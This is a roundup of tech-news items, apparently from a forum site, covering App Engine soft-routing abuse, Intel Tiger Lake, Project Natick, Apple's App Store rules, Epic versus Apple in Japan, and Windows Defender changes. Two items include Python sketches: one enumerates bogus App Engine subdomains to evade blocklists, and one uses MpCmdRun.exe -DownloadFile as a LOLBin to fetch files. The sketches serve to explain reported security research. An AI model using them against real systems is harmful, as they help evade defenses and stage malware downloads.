
A newly discovered technique by a researcher shows how Google's App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products. Google App Engine is a cloud-based service platform for developing and hosting web apps on Google's servers. While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine's infrastructure risky is how its subdomains are generated and how paths are routed. Typically, scammers use a cloud service to create a malicious app that gets assigned a subdomain, then host phishing pages there, or use the app as a command-and-control (C2) server to deliver malware payloads. But the URL structures are usually generated in a manner that makes them easy to monitor and block with enterprise security products, should the need arise. On Microsoft Azure, for example, each app is tied to a single fixed subdomain, so a cybersecurity professional could block traffic to and from a particular app by simply blocking requests to and from that subdomain, without disrupting communication with the rest of the Azure apps that use other subdomains. It gets more complicated, however, in the case of Google App Engine. Security researcher Marcel Afrahim demonstrated how an intended design feature of Google App Engine's subdomain generator can be abused to use the app infrastructure for malicious purposes, all while remaining undetected. A subdomain, in this case, does not represent just an app; it encodes the app's version, the service name, the project ID, and the region ID. The most important point to note is that if any of those fields are incorrect, Google App Engine won't show a 404 Not Found page but will instead serve the app's "default" page (a concept referred to as soft routing). "Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed," states Afrahim, adding: "If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app." Essentially, this means there are many permutations of subdomains that all reach the attacker's malicious app. As long as every subdomain has a valid "project_ID" field, invalid variations of the other fields can be used at the attacker's discretion to generate a long list of subdomains, all of which lead to the same app. The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block the malicious activity. Further, to a technologically unsavvy user, all of these subdomains would appear to be a "secure site": after all, the appspot.com domain and all of its subdomains carry the seal of "Google Trust Services" in their SSL certificates. Worse still, most enterprise security solutions, such as the Symantec WebPulse web filter, automatically allow traffic to sites in trusted categories, and Google's appspot.com domain, thanks to its reputation and legitimate corporate use cases, earns an "Office/Business Applications" tag, skipping the scrutiny of web proxies. This complete article is posted on OUR FORUM with much more information.
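To make the soft-routing issue above concrete, here is a minimal sketch of how a single app can be reached through many subdomain permutations. The project ID ("my-project"), region ID ("uc"), and permutation count are hypothetical placeholders and do not come from Afrahim's research; the "-dot-" separator is App Engine's documented way of addressing a specific service and version in the hostname.

```python
# Minimal sketch: enumerate hostnames with bogus service/version fields.
# Because App Engine soft-routes unknown services and versions to the
# default service, every hostname below should serve the same app.
import random
import string

import requests  # third-party: pip install requests

PROJECT_ID = "my-project"  # hypothetical project ID
REGION_ID = "uc"           # hypothetical region ID


def random_label(length: int = 8) -> str:
    """Return a random DNS-safe label to use as a bogus service or version."""
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=length))


def candidate_hosts(count: int = 5):
    """Yield App Engine hostnames whose service/version fields do not exist."""
    for _ in range(count):
        version, service = random_label(), random_label()
        yield f"{version}-dot-{service}-dot-{PROJECT_ID}.{REGION_ID}.r.appspot.com"


if __name__ == "__main__":
    for host in candidate_hosts():
        resp = requests.get(f"https://{host}", timeout=10)
        # All responses should be identical: the app's default page.
        print(host, resp.status_code, len(resp.content))
```

Because the permutations are effectively unlimited, a defender cannot usefully enumerate and block them one by one; filtering has to happen at the PROJECT_ID.REGION_ID.r.appspot.com level, which is exactly why the technique is hard to contain.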

Intel's slow trickle of information on its Tiger Lake processors recently turned into a veritable flood as the company shared information about its first salvo of 10nm SuperFin chips, but one detail was missing: any official disclosure of chips with more than four cores. That changed in a decidedly low-key way, as a blog post from Intel fellow Boyd Phelps on Medium reveals that the company will introduce eight-core models soon, saying: "We also added a 3MB non-inclusive last-level-cache (LLC) per core slice. A single core workload has access to 12MB of LLC in the 4-core die or up to 24MB in the 8-core die configuration (more detail on 8-core products at a later date)." Intel claims that its four-core Tiger Lake models, by virtue of their 10nm SuperFin process, Willow Cove cores, and Iris Xe graphics, can already beat AMD's eight-core Renoir chips in some performance benchmarks. If Intel's performance projections for its quad-core models are accurate, the eight-core Tiger Lake models could prove to be exceedingly competitive against AMD's existing Ryzen Mobile 'Renoir' lineup, possibly even wresting away the lead in threaded applications. We've yet to see independent third-party verification of the quad-core Tiger Lake chips in reviews, but AMD's upcoming Zen 3 "Cezanne" APUs are now extremely important as AMD looks to keep its performance advantage in the laptop market despite the looming eight-core Tiger Lake models. The current dual- and quad-core Tiger Lake chips address only the 7 to 28W segment, while larger eight-core Tiger Lake-H processors would obviously tackle the upper echelons of the performance market, possibly stretching up to 45W models (~65W peak) for H-series Core i9 and i7 parts. We won't go into Tiger Lake's full technical details (we have all of those resources in one place here), but Intel's plans for eight-core Tiger Lake models aren't entirely surprising. Intel's current 10th-gen lineup includes 10nm Ice Lake processors that address the iGPU gaming market with up to four cores, while the 14nm Comet Lake processors slot in for high-performance productivity workloads. However, Intel told us during its Tiger Lake briefings that all of its future laptop chips will come with the 10nm SuperFin (or better) process, meaning the company won't have a split product stack for its 11th-gen lineup. Many of the limitations of Intel's previous Ice Lake models stemmed from low clock frequencies and poor yields, both of which conspired to limit performance and core counts; Intel's best 10nm efforts thus far have resulted in quad-core chips for laptops. Intel's new 10nm SuperFin process has corrected the clock speed issues, with up to a 700 MHz increase to base and boost frequencies, and the emergence of eight-core models implies that defect rates are lower, and thus yields are up, allowing Intel to punch out 10nm laptop chips with up to eight cores. Intel has no plans to bring Tiger Lake to its lineup of desktop chips, but we have already seen the first new Tiger Lake NUCs emerge from ASRock. Naturally, eight-core Tiger Lake models will also work their way into the NUC lineups, and given their pairing with the Xe graphics engine, they could prove to pack a decent performance punch for compact desktop PCs. Stay abreast of this and other news from Intel by visiting OUR FORUM.

Earlier this summer, marine specialists reeled up a shipping-container-size datacenter coated in algae, barnacles, and sea anemones from the seafloor off Scotland’s Orkney Islands. The retrieval launched the final phase of a years-long effort that proved the concept of underwater datacenters is feasible, as well as logistically, environmentally, and economically practical. Microsoft’s Project Natick team deployed the Northern Isles datacenter 117 feet deep to the seafloor in spring 2018. For the next two years, team members tested and monitored the performance and reliability of the datacenter’s servers. The team hypothesized that a sealed container on the ocean floor could provide ways to improve the overall reliability of datacenters. On land, corrosion from oxygen and humidity, temperature fluctuations, and bumps and jostles from people who replace broken components are all variables that can contribute to equipment failure. The Northern Isles deployment confirmed their hypothesis, which could have implications for datacenters on land. Lessons learned from Project Natick also are informing Microsoft’s datacenter sustainability strategy around energy, waste, and water, said Ben Cutler, a project manager in Microsoft’s Special Projects research group who leads Project Natick. What’s more, he added, the proven reliability of underwater datacenters has prompted discussions with a Microsoft team in Azure that’s looking to serve customers who need to deploy and operate tactical and critical datacenters anywhere in the world. “We are populating the globe with edge devices, large and small,” said William Chappell, vice president of mission systems for Azure. “To learn how to make data centers reliable enough not to need human touch is a dream of ours.” The underwater datacenter concept splashed onto the scene at Microsoft in 2014 during ThinkWeek, an event that gathers employees to share out-of-the-box ideas. The concept was considered a potential way to provide lightning-quick cloud services to coastal populations and save energy. More than half the world’s population lives within 120 miles of the coast. By putting datacenters underwater near coastal cities, data would have a short distance to travel, leading to fast and smooth web surfing, video streaming, and game playing. The consistently cool subsurface seas also allow for energy-efficient datacenter designs. For example, they can leverage heat-exchange plumbing such as that found on submarines. Microsoft’s Project Natick team proved the underwater datacenter concept was feasible during a 105-day deployment in the Pacific Ocean in 2015. Phase II of the project included contracting with marine specialists in logistics, shipbuilding, and renewable energy to show that the concept is also practical. “We are now at the point of trying to harness what we have done as opposed to feeling the need to go and prove out some more,” Cutler said. “We have done what we need to do. Natick is a key building block for the company to use if it is appropriate.” We have pictures, videos, and more posted on OUR FORUM.

Apple revised its App Store guidelines on Friday ahead of the release of iOS 14, the latest version of the iPhone operating system, which is expected later this month. Apple’s employees use these guidelines to approve or deny apps and updates on the App Store. Those rules have come under intense scrutiny in recent weeks from app makers who argue the iPhone maker has too much control over what software runs on iPhones and over the cut Apple takes of payments from those apps. In particular, Epic Games, the maker of Fortnite, is in a bitter legal battle with Apple over several of its guidelines, including its requirement to use in-app purchases for digital products. Apple removed Fortnite from its app store last month. One major update on Friday relates to game streaming services. Microsoft and Facebook have publicly said in recent months that Apple’s rules have restricted what their gaming apps can do on iPhones and iPads. Microsoft’s xCloud service isn’t available on iOS, and Facebook’s gaming app lacks games on iPhones. Apple now says that game streaming services, such as Google Stadia and Microsoft xCloud, are explicitly permitted. But there are conditions: games offered in the service need to be downloaded directly from the App Store, not from an all-in-one app. App makers are permitted to release a so-called “catalog app” that links to other games in the service, but each game will need to be an individual app. Apple’s rules mean that if a streaming game service has 100 games, then each of those games will need an individual App Store listing as well as a developer relationship with Apple. The individual games also have to have some basic functionality when they’re downloaded. All the games and the stores need to offer in-app purchases using Apple’s payment processing system, under which Apple usually takes 30% of revenue. “This remains a bad experience for customers. Gamers want to jump directly into a game from their curated catalog within one app just like they do with movies or songs, and not be forced to download over 100 apps to play individual games from the cloud,” a Microsoft representative said in a statement. A Google representative declined to comment. The rules underscore the tension between Apple’s control of its platform, which it says is for safety and security reasons, and emerging gaming services considered by many to be the future of the gaming industry. Game streaming services want to act as a platform for game makers, approving individual games and deciding which games to offer, but Apple wants the streaming services to act more like a bundle of games and says it will need to review each individual game. Apple does not have a cloud gaming service, but it does sell a subscription bundle of iOS games called Apple Arcade. Another change relates to classes purchased inside an iPhone app. This spring, amid the pandemic, several companies that previously enabled users to book in-person products, like Classpass, started offering virtual classes. Apple’s rules previously said that virtual classes were required to use Apple’s in-app payment process. Apple’s new guidelines say that one-on-one virtual classes, like fitness training, can bypass Apple for payment, but classes where one instructor teaches multiple people will still require apps to use Apple’s in-app purchases. For more turn to OUR FORUM.

Epic Games Inc.’s decision to sue Apple Inc. over its mobile store practices has sparked new scrutiny in the massive Japanese gaming market, prompting complaints and questions about how to counter the tech giant’s dominance. While Epic, publisher of the hit title Fortnite, focuses on the 30% revenue cut app stores typically take, Japanese game studios have broader concerns. They have long been unhappy with what they see as Apple’s inconsistent enforcement of its own App Store guidelines, unpredictable content decisions, and lapses in communication, according to more than a dozen people involved in the matter. Japan’s antitrust regulator said it will pay closer attention to the iPhone maker’s practices in the wake of the high-stakes legal clash. And in rare cases, prominent executives are beginning to speak out after staying silent out of fear of reprisal. “I want from the bottom of my heart Epic to win,” Hironao Kunimitsu, founder and chairman of Tokyo-based mobile game maker Gumi Inc., wrote on his Facebook page. Apple and Google hold a duopoly over the mobile app market outside China. Any publisher that wants a game to be played on iPhones or Android devices is effectively forced to distribute it via their app stores, sharing revenue from the initial purchase and future, related items. Epic, whose Fortnite generates more than $1 billion annually from in-game purchases of virtual cosmetics and extras, sued both companies over what it considers excessive fees and for the right to sell game extras directly to players. Apple and Google have disputed those charges in court. The iPhone maker argues its cut is justified by its provision of security, development support, and an audience of a billion users. The iPhone is a huge revenue driver for game creators in Japan, including established names like Square Enix Holdings Co., which gets 40% of its group revenue from smartphone games, and Bandai Namco Holdings Inc. Sony Corp. has a multibillion-dollar mobile hit called Fate/Grand Order. With 702,000 registered developers, Japan is home to one of the most creative developer communities. A recent study commissioned by Apple estimated the App Store ecosystem in Japan generated $37 billion in billings and sales in 2019: $11 billion in digital goods and services, $24 billion via physical goods and services, and $2 billion from in-app advertising. Read more on OUR FORUM.

Recently, it was discovered that Microsoft is no longer allowing consumers to disable the Windows Defender antivirus tool via the Windows Registry. Microsoft originally remained tight-lipped on the changes made to Windows 10’s antivirus tool, but the company has now shared more details on the whole controversy. Microsoft again confirmed that it has retired ‘DisableAntiSpyware’ to prevent users from disabling Windows Defender via the Windows Registry. However, Microsoft says it has retired the legacy option to disable the antivirus because it no longer makes any sense in the latest version of Defender. Windows Defender is designed to turn off automatically whenever users try to install another antivirus product, so it doesn’t really make sense to disable Windows 10’s built-in protection tool manually, according to Microsoft. ‘DisableAntiSpyware’ is designed only for IT pros and admins to disable the antivirus engine whenever they need to install their own security product. “The impact of the DisableAntiSpyware removal is limited to Windows 10 versions prior to 1903 using Microsoft Defender Antivirus. This change does not impact third party antivirus connections to the Windows Security app. Those will still work as expected,” Microsoft noted. By retiring this setting, Microsoft will also prevent attackers from turning off Windows Defender. Separately, a report suggests that Windows 10’s built-in antivirus software ‘Windows Defender’ has been updated with a new feature that could be abused by attackers to download malware from the internet. According to security researcher Askar, Windows Defender’s command-line tool “MpCmdRun.exe”, otherwise known as the Microsoft Antimalware Service Command Line Utility, has gained a new file-download capability. Askar claims that this change to the Windows Defender command-line tool could be abused by attackers as a living-off-the-land binary (LOLBin). In other words, hackers can abuse the binary to download any file from the internet, including malware. It also means that users will be able to use Windows Defender itself to download any file from the internet. This is unlikely to be a major security flaw, as files are still checked by Windows Defender after you finish the download using the command-line tool. In theory, the Windows Defender tool can’t be used to download malware that could infect your system, but this is an odd change, and security researchers believe it could be abused. Details are posted on OUR FORUM.
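The download behaviour Askar described boils down to a single command-line switch on MpCmdRun.exe. Below is a minimal sketch of invoking it from Python; the install path, URL, and output file are placeholder assumptions rather than values from the report, and the exact location of MpCmdRun.exe varies between Defender platform versions.

```python
# Minimal sketch of the reported MpCmdRun.exe -DownloadFile behaviour.
# Assumption: MpCmdRun.exe lives at the common install path below; on
# many systems it sits in a versioned folder under
# C:\ProgramData\Microsoft\Windows Defender\Platform instead.
import subprocess
from pathlib import Path

MPCMDRUN = Path(r"C:\Program Files\Windows Defender\MpCmdRun.exe")


def defender_download(url: str, dest: str) -> int:
    """Ask Defender's command-line utility to fetch a file; return its exit code."""
    result = subprocess.run(
        [str(MPCMDRUN), "-DownloadFile", "-url", url, "-path", dest],
        capture_output=True,
        text=True,
    )
    print(result.stdout or result.stderr)
    return result.returncode


if __name__ == "__main__":
    # Placeholder URL and destination. Defender still scans whatever it saves,
    # so known malware is flagged after the download completes.
    defender_download("https://example.com/sample.bin", r"C:\Users\Public\sample.bin")
```

This is what makes the feature attractive as a LOLBin: the download is performed by a signed, trusted Microsoft binary, so it can slip past allow-listing policies that only watch for unfamiliar executables making network requests.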